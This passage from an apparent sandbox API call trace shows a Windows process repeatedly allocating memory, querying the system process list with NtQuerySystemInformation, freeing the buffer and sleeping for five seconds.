Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.728] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.730] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.735] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.737] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.738] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.738] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.738] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.743] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.745] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.746] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.752] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.754] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.759] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.760] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.761] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.765] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.773] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.781] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.788] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.790] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.790] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.795] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.797] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.801] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.802] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.809] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.809] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.812] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.830] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.831] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.837] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.839] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.938] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.951] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0225.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0225.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0225.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.958] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0225.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0225.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0225.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) 